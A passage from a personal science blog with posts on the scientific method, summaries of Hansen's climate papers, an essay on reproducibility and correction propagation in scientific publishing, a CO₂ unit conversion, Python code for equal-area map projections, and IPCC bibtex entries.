  2. Most of my typical readers won’t read this at the publication date, because they only find my articles over various social news platforms, so if you now feel cheated by being tricked into becoming a typical reader without having a say in the matter, check the publication date and see my evil gamemasters grin (egg: ;-]). If you feel cheated, I got you today (but it’s still true ;-]) - and if you want to stop being a typical reader and start being a statistical individuum3 again, go on and read those others of my articles which really interest you (and read more of my writing - because that’s why I write this site: I want you to read it, and today I’m playing dirty ^_^)! Now go and read more! ☺ 

  3. giggling crazily 

Science

For or about scientific work.

The scientific method in a dent/tweet (140 characters)

science in a dent:

(1) Form a theory. (2) design an experiment to test the theory. (3) do it. (4) Adjust the theory, if needed → (2)

→ written in GNU social.

Please feel free to use it!

If that’s to brief:

the scientific method, explained very basically and simply.

and

That’s not faith. It’s theory. The difference is that there’s a clearly defined way to adjust the theory, when it’s wrong.

German version: Die Wissenschaftliche Methode in 130 Zeichen


Naturally this is still vastly oversimplified, but that’s the price you pay by trying to explain a complex system in 140 characters. What’s to remember: theory and experiment go side by side and fertilize each other. New theories allow finding new experiments which answer questions in the theories and allow finding new theories (or changes to old theories – or tell us which direction of fleshing out theories will likely be useful).

PS: If you have other dents or tweets about science, please feel free to add and link them in a comment.
Just like this text they need to be licensed under free licenses.

Hansen 2016 got through peer-review — “Ice melt, sea level rise and superstorms”

If this should prove to be right, it’s serious.

I’m not an expert on all the topics brought together in the paper, but I never saw stronger scientific writing than what I now read in the peer-reviewed publication, and the topics I do know are represented correctly.

Update 2018-09-03 by Aengenheyster et al. 2018: For »reaching the 1.5 K target […] MM would be required to start in 2018 for a probability of 67%.« MM means getting a 2% increase of the share of renewables every year. This is still a 33% risk of failure!

Update: Hansen 2017: Young people's burden: requirement of negative CO₂ emissions — a last, desperate chance to prevent what is shown in the paper linked below.

Even if you don’t think you get new information from the paper, if you have an interest in scientific writing, I strongly suggest reading the paper:

It is long. And great. And Open Access.

If you don’t want to read that much, you can watch James Hansen explain the gist himself:

https://www.youtube.com/watch?v=JP-cRqCQRc8

@Article{Hansen2016,
AUTHOR = {Hansen, J. and Sato, M. and Hearty, P. and Ruedy, R. and Kelley, M. and Masson-Delmotte, V. and Russell, G. and Tselioudis, G. and Cao, J. and Rignot, E. and Velicogna, I. and Tormey, B. and Donovan, B. and Kandiano, E. and von Schuckmann, K. and Kharecha, P. and Legrande, A. N. and Bauer, M. and Lo, K.-W.},
TITLE = {Ice melt, sea level rise and superstorms: evidence from paleoclimate data,
climate modeling, and modern observations that 2 °C global warming
could be dangerous},
JOURNAL = {Atmospheric Chemistry and Physics},
VOLUME = {16},
YEAR = {2016},
NUMBER = {6},
PAGES = {3761--3812},
URL = {http://www.atmos-chem-phys.net/16/3761/2016/},
DOI = {10.5194/acp-16-3761-2016},
ABSTRACT = {
We use numerical climate simulations, paleoclimate data, and
modern observations to study the effect of growing ice melt from
Antarctica and Greenland. Meltwater tends to stabilize the ocean
column, inducing amplifying feedbacks that increase subsurface
ocean warming and ice shelf melting. Cold meltwater and induced
dynamical effects cause ocean surface cooling in the Southern
Ocean and North Atlantic, thus increasing Earth's energy
imbalance and heat flux into most of the global ocean's
surface. Southern Ocean surface cooling, while lower latitudes
are warming, increases precipitation on the Southern Ocean,
increasing ocean stratification, slowing deepwater formation, and
increasing ice sheet mass loss. These feedbacks make ice sheets
in contact with the ocean vulnerable to accelerating
disintegration. We hypothesize that ice mass loss from the most
vulnerable ice, sufficient to raise sea level several meters, is
better approximated as exponential than by a more linear
response. Doubling times of 10, 20 or 40 years yield multi-meter
sea level rise in about 50, 100 or 200 years. Recent ice melt
doubling times are near the lower end of the 10–40-year range,
but the record is too short to confirm the nature of the
response. The feedbacks, including subsurface ocean warming, help
explain paleoclimate data and point to a dominant Southern Ocean
role in controlling atmospheric CO2, which in turn exercised
tight control on global temperature and sea level. The
millennial (500–2000-year) timescale of deep-ocean ventilation
affects the timescale for natural CO2 change and thus the
timescale for paleo-global climate, ice sheet, and sea level
changes, but this paleo-millennial timescale should not be
misinterpreted as the timescale for ice sheet response to a
rapid, large, human-made climate forcing. These climate feedbacks
aid interpretation of events late in the prior interglacial, when
sea level rose to +6–9 m with evidence of extreme storms while
Earth was less than 1 °C warmer than today. Ice melt cooling of
the North Atlantic and Southern oceans increases atmospheric
temperature gradients, eddy kinetic energy and baroclinicity,
thus driving more powerful storms. The modeling, paleoclimate
evidence, and ongoing observations together imply that 2 °C
global warming above the preindustrial level could be
dangerous. Continued high fossil fuel emissions this century are
predicted to yield (1) cooling of the Southern Ocean, especially
in the Western Hemisphere; (2) slowing of the Southern Ocean
overturning circulation, warming of the ice shelves, and growing
ice sheet mass loss; (3) slowdown and eventual shutdown of the
Atlantic overturning circulation with cooling of the North
Atlantic region; (4) increasingly powerful storms; and (5)
nonlinearly growing sea level rise, reaching several meters over
a timescale of 50–150 years. These predictions, especially the
cooling in the Southern Ocean and North Atlantic with markedly
reduced warming or even cooling in Europe, differ fundamentally
from existing climate change assessments. We discuss observations
and modeling studies needed to refute or clarify these
assertions.},
}

arctic unraveling

Report: Arctic Is Unraveling, discusses assessment Snow, Water, Ice and Permafrost, notes the article rising tide — sounds more like Hansen was right.

Again (see “20 years later”, from 2008).

James Hansen, 2016, “Ice melt, sea level rise and superstorms”…

…and what I can say clearly (with a video where he explains the results).

To share this briefly:

Report: Arctic Unraveling, discusses assessment, notes rising tide — sounds more like Hansen was right. links: http://draketo.de/node/764

Information challenges for scientific publishing

On 2015-08-27, Researchers from the Reproducibility Project: Psychology reported that in 100 reproduction studies, only “47% of original effect sizes were in the 95% confidence interval of the replication effect size” (RPP SCIENCE 2015, an overview of the results is available in Scientific American; in german from DLF Forschung Aktuell).

I take this worrying result as cue to describe current challenges to scientific publishing and measures to address them — including reproduction experiments, and what to do if they contest previously published and referenced work.

PDF

PDF (to print)

Org (source)

Scientific publishing has come a long way since its beginning, and its principles have allowed it to scale up from a few hundred active scientists worldwide to conferences with tens of thousands of people for a given topic. But in the last few years it hit its limits. It becomes harder each year to keep up with the amount of new papers being published and even scientists from similar fields repeatedly reinvent the same methods. To scale further and to continue to connect the scientific community, it must adapt to make it easier to get an understanding of the current state of science and keep up to date with new findings.

To grow from these challenges, scientific publishing needs to

1 The Good

Before I start with my critique of scientific publishing, I want to show where it really shines. This will put its shortcomings in the proper perspective and also serve as a reminder about methods proven by time. In this part I will focus on the aspects of scientific publishing which help dealing with a huge amount of information.

I will also contrast these aspects to ordinary websites, because these have become the standard information medium for non-scientists, yet they took up technology much faster than scientific publishing, which allowed some non-scientific publications to get on par with scientific publications in many aspects and even surpass them in a few.

1.1 Different levels of content

Scientific publications are expected to have a title, keywords, an abstract, an introduction and conclusions - in addition to any other content they have. This makes it easy for readers to choose how deep they want to delve into the topic of the paper.

  • The title and keywords allow readers to decide whether the paper could be important to their own interests.
  • The abstract gives a short takehome message: Just reading the abstract allows remembering later that there was a publication which might be useful for the question at hand.
  • The introduction gives the necessary information to gain a rough understanding of the paper, even if it’s not about ones own speciality.
  • The conclusions provide the results of the publication: If you only read the abstract, the introduction and the conclusions, you can already reason about the impact of the research on your own work.

All this taken together creates a medium where every reader can decide how much information he or she wants to ingest. This allows priorizing a specific field while still getting a rough understanding of the larger developments happening in similar topics.

Where websites typically only provide one or two representations of any given topic - often title plus teaser and the main text - scientific publications provide several layers of information which are all useful on their own.

1.2 Referencing other works

While the internet allowed ordinary publications to catch up a lot via hyperlinks (though these are still mostly used by hobby-writers and not so much by big newspapers), scientific publication still holds the gold standard for referencing other works in a robust way.

They include the title, the author, the journal, the date of publication and a link. Even if the journal dies and the DOI system breaks, a paper can still be found in third party databases like university libraries.

In the internet however, links regularly break, even those referenced in court cases. So here the web still has a lot to learn from the tried and true practices of scientific publishing.

(in the meantime, if you’re a blogger yourself, please preserve your links (german original))

1.3 Summary

The different levels of information and the robust references create a system which managed to sustain its quality during a growth in the number of researchers and publications by several orders of magnitude.

These two topics aren’t the only strengths of scientific publishing (which for example also include the peer review process in which a trusted editor asks people from the same field to provide high-quality feedback), but they are the most important strengths for the topics in which the next part identifies challenges that need to be resolved to preserve the integrity of scientific publications and to avoid and reduce the fragmentation of science by keeping researchers connected with current work from other groups.

2 The Challenges

2.1 Core Questions

The gist of the challenge of scientific publishing can be summarized in two questions:

  • “What is the expected reading for scientists?”
  • “How do you know that you can trust this paper?”

Journals are already trying to tackle both of these, but the current steps fall far short of solving the problem.

2.2 Expected reading for scientists

Suddenly you realize that there is a group of scientists in Korea who also work in your field.

This actually happened: I shared a paper with experts in the field who did not even know that the group doing the research existed.

The problem behind this experience is that the number of scientists increased more than a hundred fold (at EGU more than 15000 people met, and that’s only for earth sciences), but scientific publishing still works similar to how it worked when there were only a few hundred (communicating) scientists worldwide. And the pressure to publish as much as possible intensifies the problem a lot.

In a field like Physics of the Atmosphere, hundreds of papers are published every month. Even the reading list filtered by interest which I get per E-Mail every week contains several tens of papers per journal. And when I started to dive into my research field at the beginning of my PhD, a huge challenge was to get the basic information. It’s easy to find very detailed information, but getting the current state of scientific knowledge for a given field takes a lot of effort, especially if you don’t start in a group working on the same topic. So how should scientists keep a general knowledge of the broader field, if it’s already hard to get into one given field?

The current answers are review papers and books. Good review papers allow understanding a core topic of a given scientific community within a few days. A nice example is Data assimilation: making sense of Earth Observation. A book gives a good overview of a given field, but it requires a hefty time investment. So how do you keep a general understanding of other fields? How can we avoid reinventing the wheel again and again, just in different contexts?

A simple idea to achieve this would be to create a hierarchy of quarterly overviews:

  • STEM/MINT and social sciences.
  • A broad field (like atmospheric physics).
  • A specific subgroup (about 100 scientists).

With every overview including two aspects:

  • The state of scientific knowledge.
  • Core changes since the last overview.

The core changes would be suggested reading for all scientists in the given field, while the state of scientific knowledge would allow people to get up to speed in a given field, or to understand something interesting, and provide a path to the more detailed reviews and papers.

Assuming that on average 2-3 broad fields and subgroups are interesting to a scientist, this would allow keeping up to date with scientific development by reading one overview paper per month, and it would allow getting a broad understanding of many fields by reading the overview of an additional field every quarter.

These structured overviews would reconnect science.

To support the creation of the overviews, we might need more dedicated, paid overview writers.

Part of this job is currently done by publications like Annual Reviews, Physik-Journal (german) and Scientific American (in order of decreasing specialization), and awareness of the need to reconnect science could make it possible to extend these and similar to make it easier to acquire and keep a good understanding of the current state of science.

2.3 Trustworthy research

The second big question is: “How do you know that you can trust this paper?” To be able to trust the results shown in any paper, there are two aspects:

  1. It must be possible to reproduce the results independently, and
  2. The prior assumptions of the research have to be correct.

2.3.1 Reproducible research

The first problem can be tackled by requiring scientists to share the data and programs they analyzed, so others can reproduce the results (plots, table content and so on) with as little effort as possible. Ideally the paper should use something like autotools and org mode (german original) to create a distribution package which allows others to reproduce the paper straight from the data and ensures that the data in the package actually suffices to generate the results. This would ensure that papers provide all the small details which might not seem worthy of publication on their own but can be essential to reproduce the results with a new experimental setup.

The article Sloppy Papers (by Dennis Ogbe, 2016-04-05) provides an example of the pain caused by non-reproducible publishing; for a paper which was cited over 1500 times.

Aside from making it possible for others to reproduce your work, this also makes it easy to go back years later and answer the question:

  • „How exactly did I create the publication?“

The minimal requirements for a system for reproducible research are:

  • Create diagrams and tables directly from the data
  • Include required data and scripts (as much as allowed)
  • Automate creating the publication and checking whether it fulfills the first two requirements

That data and scripts should be under Open Access licenses for this to work should be self-evident. It is about enabling easy reproduction, and that requires building upon the previous work.

Basic reproduction of the results would then be as simple as calling

./configure; make

An example for such a system is GNU automake which provides a make distcheck command to verify that the released data suffices to create the publication. If you want to give this a try, have a look at Going from a simple Makefile to Autotools.

2.3.2 Incentives

The main challenge for such reproducibility is not technical, however. It is the competition forced upon scientists by the need to apply for external funding. If you release your scripts and data, you cannot monopolize them to apply for followup funding. On the other hand, publishing the scripts and data can help get more visibility and citations. To create incentives for publishing everything used in the research, there also need to be incentives for publishing reproduction studies.

For the publishing scientist, people who use the research provide references. If other scientists in the same field reproduce research locally, that encourages followup research which might reference the original scientist, but it is a game of luck whether other scientists will actually use and reference the published data and scripts or just use it as inspiration. Or just ignore it, because they have to focus on doing work they can publish to make it into the next round of funding. As such the incentive to create research which is easy to reproduce would rise a lot, if reproduction studies could be published more easily, because every reproduction publication would provide a reference. When we want more reproduction of research, skillfull reproduction has to provide value for scientists in its own right.

The focus I put on reproducibility does not mean that errors in publications are widespread. There are some fields with problems – for example research on new medicines, where there is lots of pressure to have a positive result, since that is required to sell a new product – but most scientific publications are sound, even where there are incentives to cut corners. Most scientists value their scientific integrity more than money, the review process works pretty well at catching inaccuracies, and the penalty for being caught red handed is severe.

However if there are no easy means to reproduce a given result, sincere errors are hard to detect, and it might take years until they show up. Requiring better reproducibility would make this much easier. Where full source data cannot be shared, it is often possible to provide example data, so this is a problem of process and legalities, not of practical feasability.

2.3.3 Propagating corrections

The second problem however is harder: What happens if a problem does go undetected. Papers usually cite other papers to provide references to the foundation they build upon, but when a paper has to be corrected, only that paper is changed, even though the correction affects all papers which cited it. This destabilizes the foundation of science, which is made worse by the sheer volume of publications: a new paper contesting the existing one will be missed by most people. If a (relevant) error in even a single publication goes undetected, it can turn up in many more publications which build upon the research.

To fix this, the journals could explicitly propagate the correction: When a publication contradicts a previous publication, the journal marks the previous publication as contested. If the authors of the previous publication support the claim, the publication is marked as corrected and all works which cited it are marked as unstable. Since the journals usually know in which part of the publication the corrected paper was cited (it’s in the latex source), they could highlight the impacted parts and then check whether the correction affects the core message of the new publication.

A common example which shows the two different cases are results referenced in the introduction. Often these provide a background which motivates the relevance of the research. But some are used as basic assumption for the rest of the paper. In the first case, a correction of the cited paper is inconsequential for the citing paper. The contesting need not be propagated to other papers using the results from the citing paper. In the second case, however, the correction might invalidate the foundation of the citing paper which casts doubt on its results and needs to be propagated to all papers which reference them.

Marking papers as contested could easily be accomplished by creating corresponding microformats: When publishing a paper which corrects an earlier paper, add a link to the earlier paper which says “A corrects B” (marked in microformat syntax to make it machine readable). As second step inform the journal which published the earlier paper. The journal then markes the paper as “contested by A”. Then it asks the authors of the earlier paper for comment. If they agree that they were corrected, the earlier paper gets marked as “corrected by A”. If they do not agree that the earlier paper was corrected, the paper gets marked as “B contests A”. That way journals could routinely scan research cited in the papers they provide to ensure that all the assumptions used in the papers are solid - which would allow them to provide additional value to their readers: Show the last time, all references were checked to ensure that they weren’t contested - and if a reference is contested, check whether its correction impacts the core message of the research.

It would strengthen the role of journals as guardians for the integrity of scientific publication.

2.4 Summary

With the current state of scientific publishing, it is hard to keep a general knowledge of related fields, which leads to repeatedly reinventing the same methods in different contexts. Also errors which make it through the review-process and persist until they are referenced by other publications can persist even though they might be corrected in the original publication.

These challenges can be addressed by periodic overviews at different levels of specialization, reporting on both the state and the changes of scientific knowledge and methods, by more support for reproducible research and reproduction studies and by propagating corrections to papers into those which reference them.

3 Conclusions

3.1 Conclusions

Many aspects of scientific publishing are unmatched even with all the new development in the web, but the rising number of publications per year creates new challenges.

To meet these challenges, structured overviews and high-level updates to the current state of the art could help reconnecting different fields of science, and reproducible research, incentives for reproduction studies and propagating corrections to papers could ensure that published results stay trustworthy with the growing number of active scientists.

There are already journals and organizations who try to fill the role of reconnecting science, so I am confident, that these problems will be addressed with time. I hope that this article can contribute by providing an overview of the challenges and a clear vision of questions which need new and improved answers with the growing number of scientists and publications:

  • “What is the expected reading for scientists?”
  • “How do you know that you can trust this paper?”

A final word of warning:

When a measure becomes a target, it ceases to be a good measure. — Goodhart’s law (quote, background)

If publishing is a goal, it cannot be a good metric of the quality of scientific work, regardless of the amount of convolution we add.

AnhangGröße
2014-11-28-Fr-information-challenges-scientific-publishing.org18.93 KB
2014-11-28-Fr-information-challenges-scientific-publishing.pdf184.53 KB

propagating changes; comment on "Time To Rethink Retractions And Corrections?"

A comment on Amending Published Articles: Time To Rethink Retractions And Corrections? (doi: 10.1101/118356) which asks for making it easier and less of a matter of guilt to change published articles.

Update: Leonid Schneider from forbetterscience notes that there’s a whole dungeon of misconduct which might be facilitated by “living papers”. We need investigate problems in depth before changing established processes. Scientific communication is a complex process. Publication is an important part of it.

Firstoff: The underlying problem which makes it so hard to differenciate between honest errors and fraud is that publications are kind of a currency in science. It is not possible to make them serve a dual function — not only scientific communication but also the main currency to get a job in science — without also getting Fraud. If you want a short quotation for that, you can take Goodheart's law:

When a measure becomes a target, it ceases to be a good measure. — Goodheart’s Law

We cannot reach the best possible level of scientific communication while publications are part of the currency of science. And there is no metric which can fix this.

That said, I’m happy to see you take up changes to scientific articles! It ties into concepts I wrote a two years ago with concepts for propagating corrections: Information challenges section 2.3.3: Propagating corrections (this is a section in a larger article about information challenges for scientific publishing)

Note however that if you have living documents and only the latest version of the document is treated as authoritative, then scientific information propagation becomes orders of magnitude more expensive. There must be a clear distinction between changes which invalidate anything others might have built upon and changes which keep all the citable information the same. As I showed in the article I linked to, there are technical measures which could reduce the cost of propagating corrections. If you make corrections easier, then these measures will become essential.

Guilt should not be the problem (and should not be part of making a change). The actual problem is that a change to a published paper incurs a cost on everyone who cited it.

Keep in mind that when you change an article, you need to inform everyone who cited it.

Journals could reduce this cost on authors by checking where the article was cited and whether the change is relevant to the reliability of the citing article. If it is, then the author of the citing article must take action. With highly cited articles, a single amendment could require hundreds of scientists to take action and amend their articles as well, if it affected the core message of the article, this could cause ripples of ever more articles to amend. There are two core ways to minimize this: Amend quickly, while the article has few citations, and ensure high quality and consequently a low rate of invalidating changes for published articles.

In the article I posted,1 I suggested using microformats to mark amendments. Their important attribute is that they can be parsed automatically, that anyone with access to the source of a publication can automate checking for the region in which a given reference was used, and that they are not tied to any given platform. Any other method which has these properties works as well.

Keep in mind, however, that while anyone can search through those updates, someone must do it. To make the system reliable that someone will have to be paid.


  1. Information Challenges for Scientific Publishing, section 2.3.3: Propagating corrections: http://www.draketo.de/english/science/challenges-scientific-publishing#sec-2-3-3 

Conversion factor from ppmv CO₂ to Gt C

I just spent half an hour on finding the references for this, so I can spend 5 minutes providing it for others on the web.

conversion factor footnote

The conversion factor from ppmv CO\(_2\) to GtC is 2.14, calculated from the molar mass of roughly \(M_{\text{CO}_{2}} = 44 g/mol\) for carbon dioxide, the molar mass of \(M_{\text{C}} = 12 g/mol\) for carbon, \(M_{\text{air}} = 28.9 g/mol\) for air (Halliday et al., 2003) and \(m_{\text{air}} 5.15 \times 10^{6} Gt\) for the total mass of the air (Trenberth and Smith, 2005): \(\left ( \frac{M_{\text{air}}}{M_{\text{CO}_{2}}} · \frac{M_{\text{CO}_{2}}}{M_{C}} · \frac{1}{m_{\text{air}}} \right )^{-1}\)

(let ((Mco2 44.0) ; g / mol
      (Mair 28.9) ; g / mol
      (Mc 12.0) ; g / mol
      (mair 5.15)) ; 1,000,000 Gt
  (/ 1
     (* (/ Mair Mco2)
        (/ (/ Mco2 Mc) mair))))

Halliday et al., 2003: Halliday, D., Resnick, R., Walker, J., and Koch, S. (2003). Physik. Wiley.

Trenberth and Smith, 2005: Trenberth, K. E. and Smith, L. (2005). The mass of the atmosphere: A constraint on global analyses. Journal of Climate, 18(6):864–875.

PS: GtC Gigaton Carbon = PgC Petagram Carbon; ppmv CO₂ = parts per million (in volume) carbon dioxide in air.

AnhangGröße
conversion-factor-ppmv-co2-to-gtc.png18.27 KB

Equal-Area Map Projections with Basemap and matplotlib/pylab

PDF (read as slides)

Org (reproduce)

Plotting global equal area maps with python, matplotlib/pylab and Basemap.

Table of Contents

1 Problem

1.1 lat/lon pixels misrepresent areas

  1. Projected   B_columns
    1. Simple Flat   BMCOL B_block

      sibiria-china-flat.png


    2. Globe   BMCOL

      sibiria-china-globe.png



  2. Note   B_ignoreheading

    Sibiria 13,1 · 106 km² vs. china 9.7 · 106 km²

    Maps thanks to Marble Desktop Globe and Open Street Map, available under CC by-sa and Open Data Commons Open Database License (ODbL).


2 Map-Notes

2.1 Map Projections

  1. Maps   B_columns
    1. Hobo-Dyer   BMCOL B_block
      • Rectangle
      • equidistant longitude
      • longitude/latitude over the Mediterranean Sea (more exactly: \(37.5^\circ\))
      • Similar Maps: Gall-Peters (thinner), Lambert (wider)
      • Basemap: equal area cylindrical (cea) with latts=37.5

    2. Hammer   BMCOL B_block
      • Elliptic
      • Low distortion at the poles
      • 2:1 → 2 per page
      • the earth appears round without making it hard to recognize patterns
      • Similar Maps: Mollweide (more distorted at the poles, parallel latitudes)
      • Basemap: hammer

    3. Flat Polar Quartic   B_block BMCOL
      • Elliptic with polar cuts
      • parallel latitudes
      • Standard parallels at \(33^\circ 45' N/S\)
      • poles are \(\frac{1}{3}\) the equator
      • Similar: Eckart IV (poles are half the equator)
      • Basemap: mbtfpq


3 Plotted

3.1 Hobo-Dyer

m = map.Basemap(projection='cea', lat_ts=37.5)
outfile = "hobo-dyer.png"
pl.title("Hobo Dyer: Cylindric Equal Area at $37.5^\\circ N$")

hobo-dyer.png

3.2 Hammer

m = map.Basemap(projection='hammer', lon_0=0)
outfile = "hammer.png"
pl.title("Hammer") # latex-test: $\frac{1}{2}$

hammer.png

3.3 Flat Polar Quartic

m = map.Basemap(projection='mbtfpq', lon_0=0)
outfile = "flatpolarquartic.png"
pl.title("Flat Polar Quartic: parallels at $33^\\circ 45' N/S$")

flatpolarquartic.png

4 Other maps

4.1 Other Equal Area map types

  • Goode homolosine: Split, focus on land or ocean, straight latitude parallels, approximately preserve most shapes. Not available in matplotlib.
  • Eckert IV: Like Flat Polar Quartic, parallels at 40° 30' N/S, poles are half the equator.
  • Lambert cylindrical equal area: Like Hobo Dyer, very wide, shapes at the equator are correct.
  • Gall Peters: Like Hobo Dyer, appears more distorted than Hobo-Dyer, shapes over europe correct (45°).
  • Mollweide: Like Hammer with straight latitude parallels.
  • Werner: It’s a heart :) - focus on a hemisphere without ignoring the rest. General case: Bonne.
  • Tobler: General case leading to Lambert, Mollweide, Mollington and a few more — also see Tobler1973 after you manage to gnawl through the paywall…
  • Collignon: Triangle, for cosmic microwave background.

5 Conclusing

5.1 Maps I plan to use

  1. Maps   B_columns
    1. Hobo-Dyer   BMCOL B_block

      hobo-dyer.png

      To show regional fluxes and longitudinally constrained regions: Easy to spot on rectangular grid.


    2. Hammer   B_block BMCOL

      hammer.png

      To show a global overview: Helps the understanding of global data because it appears most similar to a real earth while including the whole earth surface.


    3. Flat Polar Quartic   B_block BMCOL

      flatpolarquartic.png

      For mainly latitudinally constrained regions: Straight latitudinal lines and high latitudinal resolution near the poles.



6 Thank you!

6.1 Thank you for listening!

  1. Questions?   B_block BMCOL

7 Appendix: Supporting functions

7.1 Basemap Imports

# basemap, pylab and numpy for plotting
import mpl_toolkits.basemap as map
import pylab as pl
import numpy as np
# netcdf for reading the emission files
import netCDF4 as nc

7.2 Draw a map

<<addmapfeatures>>
<<addindicatrix>>
try:
  <<addemissions>>
  <<addcolorbar>>
except RuntimeError: # recover from missing fluxfile
  m.fillcontinents(color='coral',lake_color='aqua')
pl.savefig(outfile)
return "./" + outfile + ""

7.3 Map features

# add map lines
m.drawcoastlines()
# only fill continents if we do not plot emissions
# m.fillcontinents(color='coral',lake_color='aqua')
m.drawparallels(np.arange(-90.,120.,30.), 
                labels=[False,True,True,False])
m.drawmeridians(np.arange(0.,420.,60.), 
                labels=[True,False,False,True])
m.drawmapboundary(fill_color='aqua')

7.4 Tissots Indicatrix

# draw tissot's indicatrix to show distortion.
for y in np.linspace(m.ymax/20,19*m.ymax/20,9):
    for x in np.linspace(m.xmax/20,19*m.xmax/20,12):
        lon, lat = m(x,y,inverse=True)
        poly = m.tissot(lon,lat,4.0,100,
                        facecolor='green',
                        zorder=10,alpha=0.5)

7.5 Plot emissions

# d = nc.Dataset("/run/media/arne/3TiB/CTDAS-2013-03-07-2years-base-data/"
#                "analysis/data_flux1x1_weekly/flux_1x1.nc")
d = nc.Dataset("UNPUBLISHED")
biocovmean = np.mean(
    d.variables["bio_flux_prior_cov"][:,:,:], axis=0)
# projection: matplotlib.org/basemap/users/examples.html
lons, lats = pl.meshgrid(range(-180, 180), 
                         range(-90, 90))
x, y = m(lons, lats)
# choose my standard color range: vmin = -0.5*vmax
vmax = max(abs(np.max(biocovmean)), 
           2 * abs(np.min(biocovmean)))
vmin = -0.5*vmax
m.pcolor(x, y, biocovmean, shading='flat', 
         vmin=vmin, vmax=vmax) # pcolormesh is faster

7.6 Nice colorbar

pl.rcParams.update({"text.usetex": True, 
                    "text.latex.unicode": True})
colorbar = pl.colorbar(orientation="horizontal", 
                       format="%.2g") # scientific
colorbar.set_label("$CO_{2}$ fluxes [$\\frac{mol}{m^2 s}$]")

Author: Arne Babenhauserheide

Emacs 24.3.1 (Org mode 8.0.2)

Validate XHTML 1.0

AnhangGröße
flatpolarquartic.png127.57 KB
hobo-dyer.png139.26 KB
hammer.png138.15 KB
sibiria-china-flat.png1.14 MB
sibiria-china-globe.png1.14 MB
equal-area-map-projections.pdf3.06 MB
equal-area-map-projections.org10.19 KB

Hansen 2017: Young people's burden: requirement of negative CO₂ emissions

James Hansen et al. published a paper about the expected costs due to climate change, aptly named "Young people's burden".

Young people's burden: requirement of negative CO2 emissions

Temperature anomalies
(Hansen et al. 2017, License: cc-by)

The paper builds on a previous paper by Hansen et al. (2016) which I summarized in Hansen 2016 got through peer-review — “Ice melt, sea level rise and superstorms”. Hansen 2016 ends with many questions which need to be addressed.

Hansen 2017 says in the abstract:

We show that global temperature has risen well out of the Holocene range and Earth is now as warm as it was during the prior (Eemian) interglacial period, when sea level reached 6–9 m higher than today. Further, Earth is out of energy balance with present atmospheric composition, implying that more warming is in the pipeline, and we show that the growth rate of greenhouse gas climate forcing has accelerated markedly in the past decade.

In short: We knew for 35 years that this is coming,1 and we failed at stopping it. Now we have to fight hard to avoid the worst of the expected fallout.

However it keeps a sliver of hope to avoid the global chaos which would be likely to ensue when most coastal cities would become flooded and hundreds of millions of people would need to relocate:

Keeping warming to less than 1.5 °C or CO₂ below 350 ppm now requires extraction of CO₂ from the air. If rapid phaseout of fossil fuel emissions begins soon, most extraction can be via improved agricultural and forestry practices.

All the details are available in Hansen, J., Sato, M., Kharecha, P., von Schuckmann, K., Beerling, D. J., Cao, J., Marcott, S., Masson-Delmotte, V., Prather, M. J., Rohling, E. J., Shakun, J., Smith, P., Lacis, A., Russell, G., and Ruedy, R.: Young people's burden: requirement of negative CO2 emissions, Earth Syst. Dynam., 8, 577-616, https://doi.org/10.5194/esd-8-577-2017, 2017


  1. Climate Impact of Increasing Atmospheric Carbon Dioxide J. Hansen, D. Johnson, A. Lacis, S. Lebedeff, P. Lee, D. Rind, G. Russell, NASA Institute for Space Studies, Goddard Space Flight Center, 1981. Abstract: The global temperature rose by 0.2°C between the middle 1960's and 1980, yielding a warming of 0.4°C in the past century. This temperature increase is consistent with the calculated greenhouse effect due to measured increases of atmospheric carbon dioxide. Variations of volcanic aerosols and possibly solar luminosity appear to be primary causes of observed fluctuations about the mean trend of increasing temperature. It is shown that the anthropogenic carbon dioxide warming should emerge from the noise level of natural climate variability by the end of the century, and there is a high probability of warming in the 1980's. Potential effects on climate in the 21st century include the creation of drought-prone regions in North America and central Asia as part of a shifting of climatic zones, erosion of the West Antarctic ice sheet with a consequent worldwide rise in sea level, and opening of the fabled Northwest Passage. 

AnhangGröße
hansen2017--001.png820.94 KB

Hitchhikers Guide on Towels - Read from Space

Samantha Cristoforetti reads the Hitchhikers Guide to the Galaxy on the International Space Station

This is the world we live in: The Hitchhikers Guide read from Space.

If you don’t get goosebumps just thinking about it, envision it again: The old visions are becoming real step by step, and now those who actually venture in space read the works of visionaries from their temporary home beyond the atmosphere.

New traditions form from a reality which still seems unreal.

The Hitchhikers Guide read from Space.

And yes, we had a towel with us when the kids and I went riding their scooters yesterday. We used it to dry ourselves when we came back from the rain.

I wonder when I should start reading them the Hitchhikers Guide…

IPCC bibtex entries

I repeatedly stumbled over needing bibtex entries for the IPCC reports. So I guess, others might stumble over that, too. Here I share my bibtex entries for some parts of the IPCC reports.1

IPCC 1990 WG1 (physical science basis)

@BOOK{IPCC1990Science,
  title = {Climate Change 1990 The Science of Climate Change},
  publisher = {The Intergovernmental Panel on Climate Change},
  year = {1996},
  editor = {J.T. Houghton and G.J. Jenkins and J.J. Ephraums},
  author = {IPCC Working Group I}
}

IPCC 1995 WG1 (physical science basis)

@BOOK{IPCC1995Science,
  title = {Climate Change 1995 The Science of Climate Change},
  publisher = {The Intergovernmental Panel on Climate Change},
  year = {1996},
  editor = {J.T. Houghton and L.G. Meira Filho and B.A. Callander and N. Harris
    and A. Kattenberg and K. Maskell},
  author = {IPCC Working Group I}
}

IPCC 2013 WG1 (physical science basis)

@book{IPCCWG1PhysicalStocker2013,
   author = {IPCC},
   title = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   pages = {1535},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book}
}

@inbook{IPCCPolicymakersStocker2013,
   author = {IPCC},
   title = {Summary for Policymakers},
   booktitle = {Climate Change 2013: The Physical Science Basis. Contribution of Working Group I to the Fifth Assessment Report of the Intergovernmental Panel on Climate Change},
   editor = {Stocker, T.F. and Qin, D. and Plattner, G.-K. and Tignor, M. and Allen, S.K. and Boschung, J. and Nauels, A. and Xia, Y. and Bex, V. and Midgley, P.M.},
   publisher = {Cambridge University Press},
   address = {Cambridge, United Kingdom and New York, NY, USA},
   chapter = {SPM},
   pages = {1–30},
   ISBN = {ISBN 978-1-107-66182-0},
   DOI = {10.1017/CBO9781107415324.004},
   url = {www.climatechange2013.org},
   year = {2013},
   type = {Book Section}
}

@inbook{IPCCSummaryStocker2013,
